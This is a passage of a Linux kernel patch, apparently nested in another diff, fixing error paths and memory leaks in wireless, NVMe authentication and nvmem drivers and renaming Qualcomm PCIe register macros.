+ 			}
+ 		}
+ 	}
+diff --git a/drivers/net/wireless/ray_cs.c b/drivers/net/wireless/ray_cs.c
+index 1f57a0055bbd8..38782d4c4694a 100644
+--- a/drivers/net/wireless/ray_cs.c
++++ b/drivers/net/wireless/ray_cs.c
+@@ -270,13 +270,14 @@ static int ray_probe(struct pcmcia_device *p_dev)
+ {
+ 	ray_dev_t *local;
+ 	struct net_device *dev;
++	int ret;
+ 
+ 	dev_dbg(&p_dev->dev, "ray_attach()\n");
+ 
+ 	/* Allocate space for private device-specific data */
+ 	dev = alloc_etherdev(sizeof(ray_dev_t));
+ 	if (!dev)
+-		goto fail_alloc_dev;
++		return -ENOMEM;
+ 
+ 	local = netdev_priv(dev);
+ 	local->finder = p_dev;
+@@ -313,11 +314,16 @@ static int ray_probe(struct pcmcia_device *p_dev)
+ 	timer_setup(&local->timer, NULL, 0);
+ 
+ 	this_device = p_dev;
+-	return ray_config(p_dev);
++	ret = ray_config(p_dev);
++	if (ret)
++		goto err_free_dev;
++
++	return 0;
+ 
+-fail_alloc_dev:
+-	return -ENOMEM;
+-} /* ray_attach */
++err_free_dev:
++	free_netdev(dev);
++	return ret;
++}
+ 
+ static void ray_detach(struct pcmcia_device *link)
+ {
+diff --git a/drivers/net/wireless/rsi/rsi_91x_sdio.c b/drivers/net/wireless/rsi/rsi_91x_sdio.c
+index d09998796ac08..1911fef3bbad6 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_sdio.c
++++ b/drivers/net/wireless/rsi/rsi_91x_sdio.c
+@@ -1463,10 +1463,8 @@ static void rsi_shutdown(struct device *dev)
+ 
+ 	rsi_dbg(ERR_ZONE, "SDIO Bus shutdown =====>\n");
+ 
+-	if (hw) {
+-		struct cfg80211_wowlan *wowlan = hw->wiphy->wowlan_config;
+-
+-		if (rsi_config_wowlan(adapter, wowlan))
++	if (hw && hw->wiphy && hw->wiphy->wowlan_config) {
++		if (rsi_config_wowlan(adapter, hw->wiphy->wowlan_config))
+ 			rsi_dbg(ERR_ZONE, "Failed to configure WoWLAN\n");
+ 	}
+ 
+@@ -1481,9 +1479,6 @@ static void rsi_shutdown(struct device *dev)
+ 	if (sdev->write_fail)
+ 		rsi_dbg(INFO_ZONE, "###### Device is not ready #######\n");
+ 
+-	if (rsi_set_sdio_pm_caps(adapter))
+-		rsi_dbg(INFO_ZONE, "Setting power management caps failed\n");
+-
+ 	rsi_dbg(INFO_ZONE, "***** RSI module shut down *****\n");
+ }
+ 
+diff --git a/drivers/net/wireless/wl3501_cs.c b/drivers/net/wireless/wl3501_cs.c
+index 7fb2f95134760..c45c4b7cbbaf1 100644
+--- a/drivers/net/wireless/wl3501_cs.c
++++ b/drivers/net/wireless/wl3501_cs.c
+@@ -1862,6 +1862,7 @@ static int wl3501_probe(struct pcmcia_device *p_dev)
+ {
+ 	struct net_device *dev;
+ 	struct wl3501_card *this;
++	int ret;
+ 
+ 	/* The io structure describes IO port mapping */
+ 	p_dev->resource[0]->end	= 16;
+@@ -1873,8 +1874,7 @@ static int wl3501_probe(struct pcmcia_device *p_dev)
+ 
+ 	dev = alloc_etherdev(sizeof(struct wl3501_card));
+ 	if (!dev)
+-		goto out_link;
+-
++		return -ENOMEM;
+ 
+ 	dev->netdev_ops		= &wl3501_netdev_ops;
+ 	dev->watchdog_timeo	= 5 * HZ;
+@@ -1887,9 +1887,15 @@ static int wl3501_probe(struct pcmcia_device *p_dev)
+ 	netif_stop_queue(dev);
+ 	p_dev->priv = dev;
+ 
+-	return wl3501_config(p_dev);
+-out_link:
+-	return -ENOMEM;
++	ret = wl3501_config(p_dev);
++	if (ret)
++		goto out_free_etherdev;
++
++	return 0;
++
++out_free_etherdev:
++	free_netdev(dev);
++	return ret;
+ }
+ 
+ static int wl3501_config(struct pcmcia_device *link)
+diff --git a/drivers/nvme/host/auth.c b/drivers/nvme/host/auth.c
+index c8a6db7c44980..9dfd3d0293054 100644
+--- a/drivers/nvme/host/auth.c
++++ b/drivers/nvme/host/auth.c
+@@ -654,7 +654,7 @@ gen_sesskey:
+ 	return 0;
+ }
+ 
+-static void __nvme_auth_reset(struct nvme_dhchap_queue_context *chap)
++static void nvme_auth_reset_dhchap(struct nvme_dhchap_queue_context *chap)
+ {
+ 	kfree_sensitive(chap->host_response);
+ 	chap->host_response = NULL;
+@@ -676,9 +676,9 @@ static void __nvme_auth_reset(struct nvme_dhchap_queue_context *chap)
+ 	memset(chap->c2, 0, sizeof(chap->c2));
+ }
+ 
+-static void __nvme_auth_free(struct nvme_dhchap_queue_context *chap)
++static void nvme_auth_free_dhchap(struct nvme_dhchap_queue_context *chap)
+ {
+-	__nvme_auth_reset(chap);
++	nvme_auth_reset_dhchap(chap);
+ 	if (chap->shash_tfm)
+ 		crypto_free_shash(chap->shash_tfm);
+ 	if (chap->dh_tfm)
+@@ -691,7 +691,7 @@ static void __nvme_auth_free(struct nvme_dhchap_queue_context *chap)
+ 	kfree(chap);
+ }
+ 
+-static void __nvme_auth_work(struct work_struct *work)
++static void nvme_queue_auth_work(struct work_struct *work)
+ {
+ 	struct nvme_dhchap_queue_context *chap =
+ 		container_of(work, struct nvme_dhchap_queue_context, auth_work);
+@@ -868,7 +868,7 @@ int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid)
+ 			dev_dbg(ctrl->device, "qid %d: re-using context\n", qid);
+ 			mutex_unlock(&ctrl->dhchap_auth_mutex);
+ 			flush_work(&chap->auth_work);
+-			__nvme_auth_reset(chap);
++			nvme_auth_reset_dhchap(chap);
+ 			queue_work(nvme_wq, &chap->auth_work);
+ 			return 0;
+ 		}
+@@ -893,7 +893,7 @@ int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid)
+ 		return -ENOMEM;
+ 	}
+ 
+-	INIT_WORK(&chap->auth_work, __nvme_auth_work);
++	INIT_WORK(&chap->auth_work, nvme_queue_auth_work);
+ 	list_add(&chap->entry, &ctrl->dhchap_auth_list);
+ 	mutex_unlock(&ctrl->dhchap_auth_mutex);
+ 	queue_work(nvme_wq, &chap->auth_work);
+@@ -920,21 +920,7 @@ int nvme_auth_wait(struct nvme_ctrl *ctrl, int qid)
+ }
+ EXPORT_SYMBOL_GPL(nvme_auth_wait);
+ 
+-void nvme_auth_reset(struct nvme_ctrl *ctrl)
+-{
+-	struct nvme_dhchap_queue_context *chap;
+-
+-	mutex_lock(&ctrl->dhchap_auth_mutex);
+-	list_for_each_entry(chap, &ctrl->dhchap_auth_list, entry) {
+-		mutex_unlock(&ctrl->dhchap_auth_mutex);
+-		flush_work(&chap->auth_work);
+-		__nvme_auth_reset(chap);
+-	}
+-	mutex_unlock(&ctrl->dhchap_auth_mutex);
+-}
+-EXPORT_SYMBOL_GPL(nvme_auth_reset);
+-
+-static void nvme_dhchap_auth_work(struct work_struct *work)
++static void nvme_ctrl_auth_work(struct work_struct *work)
+ {
+ 	struct nvme_ctrl *ctrl =
+ 		container_of(work, struct nvme_ctrl, dhchap_auth_work);
+@@ -970,15 +956,26 @@ static void nvme_dhchap_auth_work(struct work_struct *work)
+ 	 */
+ }
+ 
+-void nvme_auth_init_ctrl(struct nvme_ctrl *ctrl)
++int nvme_auth_init_ctrl(struct nvme_ctrl *ctrl)
+ {
++	int ret;
++
+ 	INIT_LIST_HEAD(&ctrl->dhchap_auth_list);
+-	INIT_WORK(&ctrl->dhchap_auth_work, nvme_dhchap_auth_work);
++	INIT_WORK(&ctrl->dhchap_auth_work, nvme_ctrl_auth_work);
+ 	mutex_init(&ctrl->dhchap_auth_mutex);
+ 	if (!ctrl->opts)
+-		return;
+-	nvme_auth_generate_key(ctrl->opts->dhchap_secret, &ctrl->host_key);
+-	nvme_auth_generate_key(ctrl->opts->dhchap_ctrl_secret, &ctrl->ctrl_key);
++		return 0;
++	ret = nvme_auth_generate_key(ctrl->opts->dhchap_secret,
++			&ctrl->host_key);
++	if (ret)
++		return ret;
++	ret = nvme_auth_generate_key(ctrl->opts->dhchap_ctrl_secret,
++			&ctrl->ctrl_key);
++	if (ret) {
++		nvme_auth_free_key(ctrl->host_key);
++		ctrl->host_key = NULL;
++	}
++	return ret;
+ }
+ EXPORT_SYMBOL_GPL(nvme_auth_init_ctrl);
+ 
+@@ -1002,7 +999,7 @@ void nvme_auth_free(struct nvme_ctrl *ctrl)
+ 	list_for_each_entry_safe(chap, tmp, &ctrl->dhchap_auth_list, entry) {
+ 		list_del_init(&chap->entry);
+ 		flush_work(&chap->auth_work);
+-		__nvme_auth_free(chap);
++		nvme_auth_free_dhchap(chap);
+ 	}
+ 	mutex_unlock(&ctrl->dhchap_auth_mutex);
+ 	if (ctrl->host_key) {
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index a7d9b5b42b388..560ce2f05a96d 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -3825,16 +3825,17 @@ static ssize_t nvme_ctrl_dhchap_secret_store(struct device *dev,
+ 		int ret;
+ 
+ 		ret = nvme_auth_generate_key(dhchap_secret, &key);
+-		if (ret)
++		if (ret) {
++			kfree(dhchap_secret);
+ 			return ret;
++		}
+ 		kfree(opts->dhchap_secret);
+ 		opts->dhchap_secret = dhchap_secret;
+ 		host_key = ctrl->host_key;
+ 		ctrl->host_key = key;
+ 		nvme_auth_free_key(host_key);
+-		/* Key has changed; re-authentication with new key */
+-		nvme_auth_reset(ctrl);
+-	}
++	} else
++		kfree(dhchap_secret);
+ 	/* Start re-authentication */
+ 	dev_info(ctrl->device, "re-authenticating controller\n");
+ 	queue_work(nvme_wq, &ctrl->dhchap_auth_work);
+@@ -3879,16 +3880,17 @@ static ssize_t nvme_ctrl_dhchap_ctrl_secret_store(struct device *dev,
+ 		int ret;
+ 
+ 		ret = nvme_auth_generate_key(dhchap_secret, &key);
+-		if (ret)
++		if (ret) {
++			kfree(dhchap_secret);
+ 			return ret;
++		}
+ 		kfree(opts->dhchap_ctrl_secret);
+ 		opts->dhchap_ctrl_secret = dhchap_secret;
+ 		ctrl_key = ctrl->ctrl_key;
+ 		ctrl->ctrl_key = key;
+ 		nvme_auth_free_key(ctrl_key);
+-		/* Key has changed; re-authentication with new key */
+-		nvme_auth_reset(ctrl);
+-	}
++	} else
++		kfree(dhchap_secret);
+ 	/* Start re-authentication */
+ 	dev_info(ctrl->device, "re-authenticating controller\n");
+ 	queue_work(nvme_wq, &ctrl->dhchap_auth_work);
+@@ -5169,9 +5171,15 @@ int nvme_init_ctrl(struct nvme_ctrl *ctrl, struct device *dev,
+ 
+ 	nvme_fault_inject_init(&ctrl->fault_inject, dev_name(ctrl->device));
+ 	nvme_mpath_init_ctrl(ctrl);
+-	nvme_auth_init_ctrl(ctrl);
++	ret = nvme_auth_init_ctrl(ctrl);
++	if (ret)
++		goto out_free_cdev;
+ 
+ 	return 0;
++out_free_cdev:
++	nvme_fault_inject_fini(&ctrl->fault_inject);
++	dev_pm_qos_hide_latency_tolerance(ctrl->device);
++	cdev_device_del(&ctrl->cdev, ctrl->device);
+ out_free_name:
+ 	nvme_put_ctrl(ctrl);
+ 	kfree_const(ctrl->device->kobj.name);
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 2aa514c3dfa17..69f9e69208f68 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -1028,14 +1028,16 @@ static inline bool nvme_ctrl_sgl_supported(struct nvme_ctrl *ctrl)
+ }
+ 
+ #ifdef CONFIG_NVME_AUTH
+-void nvme_auth_init_ctrl(struct nvme_ctrl *ctrl);
++int nvme_auth_init_ctrl(struct nvme_ctrl *ctrl);
+ void nvme_auth_stop(struct nvme_ctrl *ctrl);
+ int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid);
+ int nvme_auth_wait(struct nvme_ctrl *ctrl, int qid);
+-void nvme_auth_reset(struct nvme_ctrl *ctrl);
+ void nvme_auth_free(struct nvme_ctrl *ctrl);
+ #else
+-static inline void nvme_auth_init_ctrl(struct nvme_ctrl *ctrl) {};
++static inline int nvme_auth_init_ctrl(struct nvme_ctrl *ctrl)
++{
++	return 0;
++}
+ static inline void nvme_auth_stop(struct nvme_ctrl *ctrl) {};
+ static inline int nvme_auth_negotiate(struct nvme_ctrl *ctrl, int qid)
+ {
+diff --git a/drivers/nvmem/rmem.c b/drivers/nvmem/rmem.c
+index 80cb187f14817..752d0bf4445ee 100644
+--- a/drivers/nvmem/rmem.c
++++ b/drivers/nvmem/rmem.c
+@@ -71,6 +71,7 @@ static int rmem_probe(struct platform_device *pdev)
+ 	config.dev = dev;
+ 	config.priv = priv;
+ 	config.name = "rmem";
++	config.id = NVMEM_DEVID_AUTO;
+ 	config.size = mem->size;
+ 	config.reg_read = rmem_read;
+ 
+diff --git a/drivers/nvmem/sunplus-ocotp.c b/drivers/nvmem/sunplus-ocotp.c
+index 52b928a7a6d58..f85350b17d672 100644
+--- a/drivers/nvmem/sunplus-ocotp.c
++++ b/drivers/nvmem/sunplus-ocotp.c
+@@ -192,9 +192,11 @@ static int sp_ocotp_probe(struct platform_device *pdev)
+ 	sp_ocotp_nvmem_config.dev = dev;
+ 
+ 	nvmem = devm_nvmem_register(dev, &sp_ocotp_nvmem_config);
+-	if (IS_ERR(nvmem))
+-		return dev_err_probe(&pdev->dev, PTR_ERR(nvmem),
++	if (IS_ERR(nvmem)) {
++		ret = dev_err_probe(&pdev->dev, PTR_ERR(nvmem),
+ 						"register nvmem device fail\n");
++		goto err;
++	}
+ 
+ 	platform_set_drvdata(pdev, nvmem);
+ 
+@@ -203,6 +205,9 @@ static int sp_ocotp_probe(struct platform_device *pdev)
+ 		(int)OTP_WORD_SIZE, (int)QAC628_OTP_SIZE);
+ 
+ 	return 0;
++err:
++	clk_unprepare(otp->clk);
++	return ret;
+ }
+ 
+ static const struct of_device_id sp_ocotp_dt_ids[] = {
+diff --git a/drivers/pci/controller/cadence/pcie-cadence-host.c b/drivers/pci/controller/cadence/pcie-cadence-host.c
+index 940c7dd701d68..5b14f7ee3c798 100644
+--- a/drivers/pci/controller/cadence/pcie-cadence-host.c
++++ b/drivers/pci/controller/cadence/pcie-cadence-host.c
+@@ -12,6 +12,8 @@
+ 
+ #include "pcie-cadence.h"
+ 
++#define LINK_RETRAIN_TIMEOUT HZ
++
+ static u64 bar_max_size[] = {
+ 	[RP_BAR0] = _ULL(128 * SZ_2G),
+ 	[RP_BAR1] = SZ_2G,
+@@ -77,6 +79,27 @@ static struct pci_ops cdns_pcie_host_ops = {
+ 	.write		= pci_generic_config_write,
+ };
+ 
++static int cdns_pcie_host_training_complete(struct cdns_pcie *pcie)
++{
++	u32 pcie_cap_off = CDNS_PCIE_RP_CAP_OFFSET;
++	unsigned long end_jiffies;
++	u16 lnk_stat;
++
++	/* Wait for link training to complete. Exit after timeout. */
++	end_jiffies = jiffies + LINK_RETRAIN_TIMEOUT;
++	do {
++		lnk_stat = cdns_pcie_rp_readw(pcie, pcie_cap_off + PCI_EXP_LNKSTA);
++		if (!(lnk_stat & PCI_EXP_LNKSTA_LT))
++			break;
++		usleep_range(0, 1000);
++	} while (time_before(jiffies, end_jiffies));
++
++	if (!(lnk_stat & PCI_EXP_LNKSTA_LT))
++		return 0;
++
++	return -ETIMEDOUT;
++}
++
+ static int cdns_pcie_host_wait_for_link(struct cdns_pcie *pcie)
+ {
+ 	struct device *dev = pcie->dev;
+@@ -118,6 +141,10 @@ static int cdns_pcie_retrain(struct cdns_pcie *pcie)
+ 		cdns_pcie_rp_writew(pcie, pcie_cap_off + PCI_EXP_LNKCTL,
+ 				    lnk_ctl);
+ 
++		ret = cdns_pcie_host_training_complete(pcie);
++		if (ret)
++			return ret;
++
+ 		ret = cdns_pcie_host_wait_for_link(pcie);
+ 	}
+ 	return ret;
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index dbe6df0cb6118..49905b2a99607 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -31,7 +31,35 @@
+ #include "../../pci.h"
+ #include "pcie-designware.h"
+ 
+-#define PCIE20_PARF_SYS_CTRL			0x00
++/* PARF registers */
++#define PARF_SYS_CTRL				0x00
++#define PARF_PM_CTRL				0x20
++#define PARF_PCS_DEEMPH				0x34
++#define PARF_PCS_SWING				0x38
++#define PARF_PHY_CTRL				0x40
++#define PARF_PHY_REFCLK				0x4c
++#define PARF_CONFIG_BITS			0x50
++#define PARF_DBI_BASE_ADDR			0x168
++#define PARF_SLV_ADDR_SPACE_SIZE_2_3_3		0x16c /* Register offset specific to IP ver 2.3.3 */
++#define PARF_MHI_CLOCK_RESET_CTRL		0x174
++#define PARF_AXI_MSTR_WR_ADDR_HALT		0x178
++#define PARF_AXI_MSTR_WR_ADDR_HALT_V2		0x1a8
++#define PARF_Q2A_FLUSH				0x1ac
++#define PARF_LTSSM				0x1b0
++#define PARF_SID_OFFSET				0x234
++#define PARF_BDF_TRANSLATE_CFG			0x24c
++#define PARF_SLV_ADDR_SPACE_SIZE		0x358
++#define PARF_DEVICE_TYPE			0x1000
++#define PARF_BDF_TO_SID_TABLE_N			0x2000
++
++/* ELBI registers */
++#define ELBI_SYS_CTRL				0x04
++
++/* DBI registers */
++#define AXI_MSTR_RESP_COMP_CTRL0		0x818
++#define AXI_MSTR_RESP_COMP_CTRL1		0x81c
++
++/* PARF_SYS_CTRL register fields */
+ #define MST_WAKEUP_EN				BIT(13)
+ #define SLV_WAKEUP_EN				BIT(12)
+ #define MSTR_ACLK_CGC_DIS			BIT(10)
+@@ -41,45 +69,53 @@
+ #define L23_CLK_RMV_DIS				BIT(2)
+ #define L1_CLK_RMV_DIS				BIT(1)
+ 
+-#define PCIE20_PARF_PM_CTRL			0x20
++/* PARF_PM_CTRL register fields */
+ #define REQ_NOT_ENTR_L1				BIT(5)
+ 
+-#define PCIE20_PARF_PHY_CTRL			0x40
++/* PARF_PCS_DEEMPH register fields */
++#define PCS_DEEMPH_TX_DEEMPH_GEN1(x)		((x) << 16)
++#define PCS_DEEMPH_TX_DEEMPH_GEN2_3_5DB(x)	((x) << 8)
++#define PCS_DEEMPH_TX_DEEMPH_GEN2_6DB(x)	((x) << 0)
++
++/* PARF_PCS_SWING register fields */
++#define PCS_SWING_TX_SWING_FULL(x)		((x) << 8)
++#define PCS_SWING_TX_SWING_LOW(x)		((x) << 0)
++
++/* PARF_PHY_CTRL register fields */
+ #define PHY_CTRL_PHY_TX0_TERM_OFFSET_MASK	GENMASK(20, 16)
+ #define PHY_CTRL_PHY_TX0_TERM_OFFSET(x)		((x) << 16)
+ 
+-#define PCIE20_PARF_PHY_REFCLK			0x4C
++/* PARF_PHY_REFCLK register fields */
+ #define PHY_REFCLK_SSP_EN			BIT(16)
+ #define PHY_REFCLK_USE_PAD			BIT(12)
+ 
+-#define PCIE20_PARF_DBI_BASE_ADDR		0x168
+-#define PCIE20_PARF_SLV_ADDR_SPACE_SIZE		0x16C
+-#define PCIE20_PARF_MHI_CLOCK_RESET_CTRL	0x174
++/* PARF_CONFIG_BITS register fields */
++#define PHY_RX0_EQ(x)				((x) << 24)
++
++/* PARF_SLV_ADDR_SPACE_SIZE register value */
++#define SLV_ADDR_SPACE_SZ			0x10000000
++
++/* PARF_MHI_CLOCK_RESET_CTRL register fields */
+ #define AHB_CLK_EN				BIT(0)
+ #define MSTR_AXI_CLK_EN				BIT(1)
+ #define BYPASS					BIT(4)
+ 
+-#define PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT	0x178
+-#define PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT_V2	0x1A8
+-#define PCIE20_PARF_LTSSM			0x1B0
+-#define PCIE20_PARF_SID_OFFSET			0x234
+-#define PCIE20_PARF_BDF_TRANSLATE_CFG		0x24C
+-#define PCIE20_PARF_DEVICE_TYPE			0x1000
+-#define PCIE20_PARF_BDF_TO_SID_TABLE_N		0x2000
++/* PARF_DEVICE_TYPE register fields */
++#define DEVICE_TYPE_RC				0x4
+ 
+-#define PCIE20_ELBI_SYS_CTRL			0x04
+-#define PCIE20_ELBI_SYS_CTRL_LT_ENABLE		BIT(0)
++/* ELBI_SYS_CTRL register fields */
++#define ELBI_SYS_CTRL_LT_ENABLE			BIT(0)
+ 
+-#define PCIE20_AXI_MSTR_RESP_COMP_CTRL0		0x818
++/* AXI_MSTR_RESP_COMP_CTRL0 register fields */
+ #define CFG_REMOTE_RD_REQ_BRIDGE_SIZE_2K	0x4
+ #define CFG_REMOTE_RD_REQ_BRIDGE_SIZE_4K	0x5
+-#define PCIE20_AXI_MSTR_RESP_COMP_CTRL1		0x81c
++
++/* AXI_MSTR_RESP_COMP_CTRL1 register fields */
+ #define CFG_BRIDGE_SB_INIT			BIT(0)
+ 
+-#define PCIE_CAP_SLOT_POWER_LIMIT_VAL		FIELD_PREP(PCI_EXP_SLTCAP_SPLV, \
+-						250)
+-#define PCIE_CAP_SLOT_POWER_LIMIT_SCALE		FIELD_PREP(PCI_EXP_SLTCAP_SPLS, \
+-						1)
++/* PCI_EXP_SLTCAP register fields */
++#define PCIE_CAP_SLOT_POWER_LIMIT_VAL		FIELD_PREP(PCI_EXP_SLTCAP_SPLV, 250)
++#define PCIE_CAP_SLOT_POWER_LIMIT_SCALE		FIELD_PREP(PCI_EXP_SLTCAP_SPLS, 1)
+ #define PCIE_CAP_SLOT_VAL			(PCI_EXP_SLTCAP_ABP | \
+ 						PCI_EXP_SLTCAP_PCP | \
+ 						PCI_EXP_SLTCAP_MRLSP | \
+@@ -91,36 +127,12 @@
+ 						PCIE_CAP_SLOT_POWER_LIMIT_VAL | \
+ 						PCIE_CAP_SLOT_POWER_LIMIT_SCALE)
+ 
+-#define PCIE20_PARF_Q2A_FLUSH			0x1AC
+-
+-#define PCIE20_MISC_CONTROL_1_REG		0x8BC
+-#define DBI_RO_WR_EN				1
+-
+ #define PERST_DELAY_US				1000
+-/* PARF registers */
+-#define PCIE20_PARF_PCS_DEEMPH			0x34
+-#define PCS_DEEMPH_TX_DEEMPH_GEN1(x)		((x) << 16)
+-#define PCS_DEEMPH_TX_DEEMPH_GEN2_3_5DB(x)	((x) << 8)
+-#define PCS_DEEMPH_TX_DEEMPH_GEN2_6DB(x)	((x) << 0)
+ 
+-#define PCIE20_PARF_PCS_SWING			0x38
+-#define PCS_SWING_TX_SWING_FULL(x)		((x) << 8)
+-#define PCS_SWING_TX_SWING_LOW(x)		((x) << 0)
++#define QCOM_PCIE_2_1_0_MAX_SUPPLY		3
++#define QCOM_PCIE_2_1_0_MAX_CLOCKS		5
+ 
+-#define PCIE20_PARF_CONFIG_BITS		0x50
+-#define PHY_RX0_EQ(x)				((x) << 24)
+-
+-#define PCIE20_v3_PARF_SLV_ADDR_SPACE_SIZE	0x358
+-#define SLV_ADDR_SPACE_SZ			0x10000000
+-
+-#define PCIE20_LNK_CONTROL2_LINK_STATUS2	0xa0
+-
+-#define DEVICE_TYPE_RC				0x4
+-
+-#define QCOM_PCIE_2_1_0_MAX_SUPPLY	3
+-#define QCOM_PCIE_2_1_0_MAX_CLOCKS	5
+-
+-#define QCOM_PCIE_CRC8_POLYNOMIAL (BIT(2) | BIT(1) | BIT(0))
++#define QCOM_PCIE_CRC8_POLYNOMIAL		(BIT(2) | BIT(1) | BIT(0))
+ 
+ struct qcom_pcie_resources_2_1_0 {
+ 	struct clk_bulk_data clks[QCOM_PCIE_2_1_0_MAX_CLOCKS];
+@@ -258,9 +270,9 @@ static void qcom_pcie_2_1_0_ltssm_enable(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable link training */
+-	val = readl(pcie->elbi + PCIE20_ELBI_SYS_CTRL);
+-	val |= PCIE20_ELBI_SYS_CTRL_LT_ENABLE;
+-	writel(val, pcie->elbi + PCIE20_ELBI_SYS_CTRL);
++	val = readl(pcie->elbi + ELBI_SYS_CTRL);
++	val |= ELBI_SYS_CTRL_LT_ENABLE;
++	writel(val, pcie->elbi + ELBI_SYS_CTRL);
+ }
+ 
+ static int qcom_pcie_get_resources_2_1_0(struct qcom_pcie *pcie)
+@@ -330,7 +342,7 @@ static void qcom_pcie_deinit_2_1_0(struct qcom_pcie *pcie)
+ 	reset_control_assert(res->ext_reset);
+ 	reset_control_assert(res->phy_reset);
+ 
+-	writel(1, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(1, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	regulator_bulk_disable(ARRAY_SIZE(res->supplies), res->supplies);
+ }
+@@ -420,9 +432,9 @@ static int qcom_pcie_post_init_2_1_0(struct qcom_pcie *pcie)
+ 	int ret;
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	ret = clk_bulk_prepare_enable(ARRAY_SIZE(res->clks), res->clks);
+ 	if (ret)
+@@ -433,37 +445,37 @@ static int qcom_pcie_post_init_2_1_0(struct qcom_pcie *pcie)
+ 		writel(PCS_DEEMPH_TX_DEEMPH_GEN1(24) |
+ 			       PCS_DEEMPH_TX_DEEMPH_GEN2_3_5DB(24) |
+ 			       PCS_DEEMPH_TX_DEEMPH_GEN2_6DB(34),
+-		       pcie->parf + PCIE20_PARF_PCS_DEEMPH);
++		       pcie->parf + PARF_PCS_DEEMPH);
+ 		writel(PCS_SWING_TX_SWING_FULL(120) |
+ 			       PCS_SWING_TX_SWING_LOW(120),
+-		       pcie->parf + PCIE20_PARF_PCS_SWING);
+-		writel(PHY_RX0_EQ(4), pcie->parf + PCIE20_PARF_CONFIG_BITS);
++		       pcie->parf + PARF_PCS_SWING);
++		writel(PHY_RX0_EQ(4), pcie->parf + PARF_CONFIG_BITS);
+ 	}
+ 
+ 	if (of_device_is_compatible(node, "qcom,pcie-ipq8064")) {
+ 		/* set TX termination offset */
+-		val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++		val = readl(pcie->parf + PARF_PHY_CTRL);
+ 		val &= ~PHY_CTRL_PHY_TX0_TERM_OFFSET_MASK;
+ 		val |= PHY_CTRL_PHY_TX0_TERM_OFFSET(7);
+-		writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++		writel(val, pcie->parf + PARF_PHY_CTRL);
+ 	}
+ 
+ 	/* enable external reference clock */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_REFCLK);
++	val = readl(pcie->parf + PARF_PHY_REFCLK);
+ 	/* USE_PAD is required only for ipq806x */
+ 	if (!of_device_is_compatible(node, "qcom,pcie-apq8064"))
+ 		val &= ~PHY_REFCLK_USE_PAD;
+ 	val |= PHY_REFCLK_SSP_EN;
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_REFCLK);
++	writel(val, pcie->parf + PARF_PHY_REFCLK);
+ 
+ 	/* wait for clock acquisition */
+ 	usleep_range(1000, 1500);
+ 
+ 	/* Set the Max TLP size to 2K, instead of using default of 4K */
+ 	writel(CFG_REMOTE_RD_REQ_BRIDGE_SIZE_2K,
+-	       pci->dbi_base + PCIE20_AXI_MSTR_RESP_COMP_CTRL0);
++	       pci->dbi_base + AXI_MSTR_RESP_COMP_CTRL0);
+ 	writel(CFG_BRIDGE_SB_INIT,
+-	       pci->dbi_base + PCIE20_AXI_MSTR_RESP_COMP_CTRL1);
++	       pci->dbi_base + AXI_MSTR_RESP_COMP_CTRL1);
+ 
+ 	return 0;
+ }
+@@ -571,13 +583,13 @@ err_res:
+ static int qcom_pcie_post_init_1_0_0(struct qcom_pcie *pcie)
+ {
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	if (IS_ENABLED(CONFIG_PCI_MSI)) {
+-		u32 val = readl(pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
++		u32 val = readl(pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT);
+ 
+ 		val |= BIT(31);
+-		writel(val, pcie->parf + PCIE20_PARF_AXI_MSTR_WR_ADDR_HALT);
++		writel(val, pcie->parf + PARF_AXI_MSTR_WR_ADDR_HALT);
+ 	}
+ 
+ 	return 0;
+@@ -588,9 +600,9 @@ static void qcom_pcie_2_3_2_ltssm_enable(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable link training */
+-	val = readl(pcie->parf + PCIE20_PARF_LTSSM);
++	val = readl(pcie->parf + PARF_LTSSM);
+ 	val |= BIT(8);
+-	writel(val, pcie->parf + PCIE20_PARF_LTSSM);
++	writel(val, pcie->parf + PARF_LTSSM);
+ }
+ 
+ static int qcom_pcie_get_resources_2_3_2(struct qcom_pcie *pcie)
+@@ -695,25 +707,25 @@ static int qcom_pcie_post_init_2_3_2(struct qcom_pcie *pcie)
+ 	u32 val;
+ 
+ 	/* enable PCIe clocks and resets */
+-	val = readl(pcie->parf + PCIE20_PARF_PHY_CTRL);
++	val = readl(pcie->parf + PARF_PHY_CTRL);
+ 	val &= ~BIT(0);
+-	writel(val, pcie->parf + PCIE20_PARF_PHY_CTRL);
++	writel(val, pcie->parf + PARF_PHY_CTRL);
+ 
+ 	/* change DBI base address */
+-	writel(0, pcie->parf + PCIE20_PARF_DBI_BASE_ADDR);
++	writel(0, pcie->parf + PARF_DBI_BASE_ADDR);
+ 
+ 	/* MAC PHY_POWERDOWN MUX DISABLE  */
+-	val = readl(pcie->parf + PCIE20_PARF_SYS_CTRL);
